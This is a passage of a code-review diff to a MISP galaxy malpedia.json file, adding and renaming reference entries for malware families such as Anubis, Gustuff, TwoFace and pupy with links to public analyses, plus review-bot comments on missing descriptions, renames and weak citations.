diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index 0ede5457..28bd70b2 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -15,6 +15,21 @@
 "type": "malpedia",
 "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e",
 "values": [
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash",
+ "https://www.us-cert.gov/ncas/alerts/TA18-275A",
+ "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
+ "https://github.com/fboldewin/FastCashMalwareDissected/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02",
+ "value": "FastCash"
+ },
 {
 "description": "",
 "meta": {
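Review bot: The new FastCash entry (the added block in this hunk) ships with an empty `description` even though its refs include a US-CERT alert and a public dissection repository, so galaxy consumers get nothing but a bare name. A one-liner grounded in what the refs already say would do, e.g. `"description": "Malware family tracked by Malpedia as aix.fastcash; see US-CERT alert TA18-275A and the linked FastCashMalwareDissected repository for analysis."`. The `aix.` id prefix is the only one of its kind visible in this diff (the others are apk., asp., elf., fas., jar., js., osx.), so if any downstream tooling keys on the platform prefix it is worth confirming it copes with a new value.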
@@ -44,6 +59,32 @@
 "uuid": "80447111-8085-40a4-a052-420926091ac6",
 "value": "AndroRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis",
+ "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
+ "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
+ "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
+ "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
+ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
+ "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html",
+ "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
+ "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
+ "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
+ "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html",
+ "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html"
+ ],
+ "synonyms": [
+ "BankBot"
+ ],
+ "type": []
+ },
+ "uuid": "85975621-5126-40cb-8083-55cbfa75121b",
+ "value": "Anubis"
+ },
 {
 "description": "",
 "meta": {
@@ -86,23 +127,6 @@
 "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
 "value": "Bahamut (Android)"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot",
- "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
- "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
- "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
- "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
- "http://blog.koodous.com/2017/05/bankbot-on-google-play.html"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "85975621-5126-40cb-8083-55cbfa75121b",
- "value": "BankBot"
- },
 {
 "description": "",
 "meta": {
@@ -143,13 +167,28 @@
 "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6",
 "value": "Catelites"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois",
+ "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2e230ff8-3971-4168-a966-176316cbdbf2",
+ "value": "Chamois"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
 "http://blog.checkpoint.com/2017/01/24/charger-malware/",
- "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
+ "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf"
 ],
 "synonyms": [],
 "type": []
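Review bot: The removed BankBot entry's UUID `85975621-5126-40cb-8083-55cbfa75121b` is the one reused by the Anubis entry added in the previous hunk, with "BankBot" kept only as a synonym, so this is a rename/merge rather than a deletion. Keeping the UUID is the right way to leave existing galaxy references resolvable, but the `value` string changes from "BankBot" to "Anubis", and if tags are derived from `value` (as MISP galaxy tags normally are) events carrying the old tag will stop matching; that deserves a line in the commit message. The `apk.bankbot` Malpedia URL is dropped as well — unless Malpedia redirects it, keeping it as a second ref on the Anubis entry would preserve the trail for anyone who reaches the entry via the old name.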
@@ -190,6 +229,34 @@
 "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724",
 "value": "Clientor"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper",
+ "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html",
+ "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/",
+ "https://news.drweb.com/show?lng=en&i=12739"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e",
+ "value": "Clipper"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot",
+ "https://twitter.com/LukasStefanko/status/1102937833071935491"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "151bf399-aa8f-4160-b9b5-8fe222f2a6b1",
+ "value": "CometBot"
+ },
 {
 "description": "",
 "meta": {
@@ -270,6 +337,35 @@
 "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd",
 "value": "ExoBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus",
+ "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv",
+ "https://securitywithoutborders.org/blog/2019/03/29/exodus.html",
+ "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8",
+ "value": "Exodus"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dd821edd-901b-4a5e-b35f-35bb811964ab",
+ "value": "FakeSpy"
+ },
 {
 "description": "",
 "meta": {
@@ -343,6 +439,19 @@
 "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
 "value": "GlanceLove"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldenrat",
+ "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e111fff8-c73c-4069-b804-2d3732653481",
+ "value": "GoldenRAT"
+ },
 {
 "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ",
 "meta": {
@@ -357,6 +466,20 @@
 "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32",
 "value": "GPlayed"
 },
+ {
+ "description": "Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.\r\nThe analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff",
+ "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html",
+ "https://www.group-ib.com/media/gustuff/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f",
+ "value": "Gustuff"
+ },
 {
 "description": "",
 "meta": {
@@ -475,6 +598,19 @@
 "uuid": "4793a29b-1191-4750-810e-9301a6576fc4",
 "value": "LokiBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat",
+ "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1785a4dd-4044-4405-91c2-efb722801867",
+ "value": "LuckyCat"
+ },
 {
 "description": "",
 "meta": {
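Review bot: The Gustuff `description` in the first hunk carries vendor press copy that will age badly — "Gustuff has previously never been reported" and "a new generation of malware" are claims about the moment of publication, not about the family — and a reference dataset should describe what the malware is rather than how novel it was. I would keep the factual parts (Android banking Trojan, abuse of the Accessibility Service, web fakes/overlays against the listed bank and crypto apps, the per-country app counts) and delete those two sentences. The "Group-IB describes ..." attribution at the start is good and matches how the GPlayed entry is worded; keep it.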
@@ -574,6 +710,19 @@
 "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616",
 "value": "Fake Pornhub"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat",
+ "https://twitter.com/LukasStefanko/status/1084774825619537925"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "661471fe-2cb6-4b83-9deb-43225192a849",
+ "value": "Premier RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -593,7 +742,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores",
- "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html"
+ "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html"
 ],
 "synonyms": [],
 "type": []
@@ -647,6 +796,19 @@
 "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417",
 "value": "Rootnik"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker",
+ "https://twitter.com/LukasStefanko/status/1117795290155819008"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65",
+ "value": "Sauron Locker"
+ },
 {
 "description": "",
 "meta": {
@@ -781,6 +943,21 @@
 "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e",
 "value": "Switcher"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat",
+ "https://twitter.com/LukasStefanko/status/1118066622512738304"
+ ],
+ "synonyms": [
+ "Assassin RAT"
+ ],
+ "type": []
+ },
+ "uuid": "46151a0d-aa0a-466c-9fff-c2c3474f572e",
+ "value": "TalentRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -855,7 +1032,7 @@
 "value": "Triada"
 },
 {
- "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
+ "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout",
@@ -934,6 +1111,20 @@
 "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387",
 "value": "Xbot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25",
+ "value": "XLoader"
+ },
 {
 "description": "",
 "meta": {
@@ -947,6 +1138,32 @@
 "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
 "value": "XRat"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth",
+ "https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7",
+ "value": "YellYouth"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen",
+ "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "46d6d102-fc38-46f7-afdc-689cafe13de5",
+ "value": "Zen"
+ },
 {
 "description": "",
 "meta": {
@@ -978,6 +1195,36 @@
 "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202",
 "value": "Ztorg"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface",
+ "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/",
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf",
+ "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/"
+ ],
+ "synonyms": [
+ "HyperShell"
+ ],
+ "type": []
+ },
+ "uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba",
+ "value": "TwoFace"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222",
+ "value": "Unidentified ASP 001 (Webshell)"
+ },
 {
 "description": "",
 "meta": {
@@ -1071,15 +1318,34 @@
 "uuid": "8a42a699-1746-498b-a558-e7113bb916c0",
 "value": "Cpuminer (ELF)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r",
+ "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/",
+ "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html"
+ ],
+ "synonyms": [
+ "CriptTor"
+ ],
+ "type": []
+ },
+ "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74",
+ "value": "Cr1ptT0r"
+ },
 {
 "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury",
 "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
+ "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
 "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
 "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
- "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"
+ "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf",
+ "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/"
 ],
 "synonyms": [],
 "type": []
@@ -1113,6 +1379,19 @@
 "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60",
 "value": "ext4"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot",
+ "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "501e5434-5796-4d63-8539-d99ec48119c2",
+ "value": "FBot"
+ },
 {
 "description": "",
 "meta": {
@@ -1165,11 +1444,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek",
 "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/",
+ "https://threatlabs.avast.com/botnet",
+ "https://blog.avast.com/hide-n-seek-botnet-continues",
 "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
 "https://blog.netlab.360.com/hns-botnet-recent-activities-en/",
 "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/",
 "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
- "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/"
+ "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
+ "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html"
 ],
 "synonyms": [
 "HNS"
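Review bot: In the second hunk, `https://threatlabs.avast.com/botnet` added to the Hide and Seek refs has no article path, so it is a section landing page rather than a citation and will not tell a reader which Avast write-up it stands for; the neighbouring `https://blog.avast.com/hide-n-seek-botnet-continues` already points at a specific post. Either replace the bare URL with the specific Threat Labs article on HNS or drop it, otherwise it will silently rot into whatever that section shows next year.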
@@ -1239,12 +1521,29 @@
 "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d",
 "value": "Lady"
 },
+ {
+ "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta",
+ "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/",
+ "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7",
+ "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes"
+ ],
+ "synonyms": [
+ "PureMasuta"
+ ],
+ "type": []
+ },
+ "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd",
+ "value": "Masuta"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey",
- "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger"
+ "https://securitykitten.github.io/2016/12/14/mikey.html"
 ],
 "synonyms": [],
 "type": []
@@ -1265,7 +1564,8 @@
 "https://isc.sans.edu/diary/22786",
 "https://github.com/jgamblin/Mirai-Source-Code",
 "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/",
+ "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/"
 ],
 "synonyms": [],
 "type": []
@@ -1377,6 +1677,19 @@
 "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7",
 "value": "Persirai"
 },
+ {
+ "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy",
+ "https://github.com/n1nj4sec/pupy"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d",
+ "value": "pupy (ELF)"
+ },
 {
 "description": "",
 "meta": {
@@ -1474,6 +1787,19 @@
 "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0",
 "value": "Spamtorte"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup",
+ "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa",
+ "value": "SpeakUp"
+ },
 {
 "description": "",
 "meta": {
@@ -1500,6 +1826,19 @@
 "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98",
 "value": "Stantinko"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless",
+ "https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656",
+ "value": "Sunless"
+ },
 {
 "description": "",
 "meta": {
@@ -1533,16 +1872,18 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami",
 "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
 "http://get.cyberx-labs.com/radiation-report",
- "https://www.8ackprotect.com/blog/big_brother_is_attacking_you"
+ "https://www.8ackprotect.com/blog/big_brother_is_attacking_you",
+ "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/"
 ],
 "synonyms": [
 "Amnesia",
+ "Muhstik",
 "Radiation"
 ],
 "type": []
 },
 "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac",
- "value": "Tsunami"
+ "value": "Tsunami (ELF)"
 },
 {
 "description": "",
@@ -1670,9 +2011,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos",
- "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf",
- "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
- "https://en.wikipedia.org/wiki/Xor_DDoS"
+ "https://en.wikipedia.org/wiki/Xor_DDoS",
+ "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html",
+ "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html"
 ],
 "synonyms": [],
 "type": []
@@ -1695,6 +2036,23 @@
 "uuid": "9218630d-0425-4b18-802c-447a9322990d",
 "value": "Zollard"
 },
+ {
+ "description": "Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad",
+ "https://github.com/Hopfengetraenk/Fas-Disasm",
+ "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft"
+ ],
+ "synonyms": [
+ "Acad.Bursted",
+ "Duxfas"
+ ],
+ "type": []
+ },
+ "uuid": "fb22d876-c6b5-4634-a468-5857088d605c",
+ "value": "AutoCAD Downloader"
+ },
 {
 "description": "",
 "meta": {
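Review bot: Renaming `value` from "Tsunami" to "Tsunami (ELF)" in the first hunk while keeping the UUID is consistent with "Cpuminer (ELF)" and "pupy (ELF)" elsewhere in this file, but if galaxy tags are built from `value` then anything tagged with the plain "Tsunami" name stops matching after this change; listing the old name in `synonyms` (`"Tsunami",` next to Amnesia/Muhstik/Radiation) or at least calling the rename out in the commit message would soften that. Adding "Muhstik" as a synonym also folds what the cited Threatpost title presents as its own botnet into Tsunami — fine if Malpedia treats Muhstik as a Tsunami variant, but with an empty `description` a reader has no way to tell, so a one-line description stating the relationship would help.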
@@ -1739,6 +2097,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind",
+ "https://blogs.seqrite.com/evolution-of-jrat-java-malware/",
 "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat",
 "http://malware-traffic-analysis.net/2017/07/04/index.html",
@@ -1759,6 +2118,21 @@
 "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c",
 "value": "AdWind"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload",
+ "https://colin.guru/index.php?title=Advanced_Banload_Analysis",
+ "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043",
+ "value": "Banload"
+ },
 {
 "description": "",
 "meta": {
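Review bot: The Banload entry in the second hunk sits under the Malpedia id `jar.banload`, yet two of its three external refs are about the Windows family — the ESET "CPL Malware in Brasil" PDF and Microsoft's `TrojanDownloader:Win32/Banload` encyclopedia page — so a reader following them lands on Win32 material rather than the Java variant. If this file also carries a `win.banload` entry (not visible in this diff), those two refs probably belong there; if not, a short description such as `"Java (JAR) incarnation of the Brazilian Banload banking downloader; the Win32 variant is documented separately."` would stop the mismatch from confusing tag consumers. Either way the `"value": "Banload"` is platform-less, unlike "Cpuminer (ELF)" / "pupy (ELF)" elsewhere in the file, so consider "Banload (JAR)" for consistency if a Windows entry exists.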
@@ -1775,14 +2149,41 @@
 "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84",
 "value": "CrossRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat",
+ "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3724d5d0-860d-4d1e-92a1-0a7089ca2bb3",
+ "value": "FEimea RAT"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash",
+ "https://twitter.com/r3c0nst/status/1111254169623674882"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "71286008-9794-4dcc-a571-164195390c39",
+ "value": "JavaDispCash"
+ },
 {
 "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat",
+ "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
 "https://github.com/java-rat",
